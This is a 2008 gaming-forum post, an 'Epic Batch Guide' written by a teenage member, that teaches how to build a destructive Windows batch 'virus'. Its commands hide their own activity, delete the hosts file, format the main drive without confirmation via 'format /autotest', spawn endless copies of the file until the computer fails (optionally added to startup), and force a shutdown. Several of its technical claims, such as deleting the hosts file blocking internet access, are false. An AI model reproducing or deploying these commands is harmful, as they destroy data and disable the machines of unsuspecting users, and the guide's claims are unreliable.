Go Back   Gaming Gutter


» Site Navigation
» Home
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» Recent Threads
Go to first new post [MULTI-TRAINER] Eclipse
10-04-2008 04:39 PM
by Horde
Last post by April<33
Today 02:59 AM
94 Replies, 2,899 Views
Go to first new post Selling 3 mil Gold for...
Today 02:23 AM
by 1x1
Last post by 1x1
Today 02:23 AM
0 Replies, 1 Views
Go to first new post Best Breakfast Food?
10-23-2008 12:00 PM
Last post by geff_chang
Today 02:03 AM
143 Replies, 963 Views
Go to first new post Instruments, anyone?
10-23-2008 11:50 AM
Last post by geff_chang
Today 02:02 AM
140 Replies, 769 Views
Go to first new post Favorite Junkfood?
10-26-2008 01:36 PM
Last post by geff_chang
Today 02:02 AM
143 Replies, 722 Views
View Single Post

 Epic Batch Guide
Old 05-18-2008, 08:02 AM   #1 (permalink)
Junkas
Banned

Male Junkas is offline
 
Join Date: Nov 2006
Location: New Jersey
Age: 13
Posts: 953
GPoints: 53
iTrader: 0 / 0%
Junkas Is Amongst RoyaltyJunkas Is Amongst Royalty
Rep Power: 0
Epic Batch Guide

Epic Batch Guide 1.0


Lets start with simplistic, say you want to to make your virus (of sorts) display a message, you would do that with echo.

Code:
@echo FUCK YOU!!
Simple enough; now you need to follow that up with some commands for doing stuff. Make sure echo is off.

Code:
@echo off
Put that as the first line in your batch file. This makes it so that they (the people running the file) cannot see what the batch file is doing.

Now Some Commands.

1) Block Internet Access

Code:
 cd WINDOWS\SYSTEM32\DRIVERS\ETC
attrib hosts -r -h
del hosts
That deletes the files that are necessary for you to access the internet.
(Also, make sure echo is OFF, or else it show that the file is deleting stuff)

2) Hidden Command (HiCM)

Quote:
format /autotest
This command is lesser know, because it is indeed not documented. What this does is format the main drive without asking for confirmation from the user. Make sure echo is off so it does not show the formatting process.

3) Unending Loop

Code:
@echo off
:loop
start ****.bat
goto loop
You change out **** with the name of your batch file, what this does is continually open and open and open the batch file slowing your PC down until it dies, you must have a fast computer, 4 gigs of ram or more to defend against this attack. For extra lulz make it copy into system startup.

Protip: You may want to use remarks, so you can go back and edit them later, knowing what you put them there for.

Code:
rem THIS IS A REMARK, BASICALLY A COMMENT IN THE CODE.
4) Shutdown force

Code:
shutdown -r -t 10 -c ""
In between the quotations is where you want to put the shutdown message, it can be anything at all.

/Guide
  Reply With Quote
 
Powered by vBadvanced CMPS v3.0 RC2

All times are GMT -7. The time now is 03:00 AM.


vBulletin skin developed by: eXtremepixels
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.13289905 seconds (100.00% PHP - 0% MySQL) with 18 queries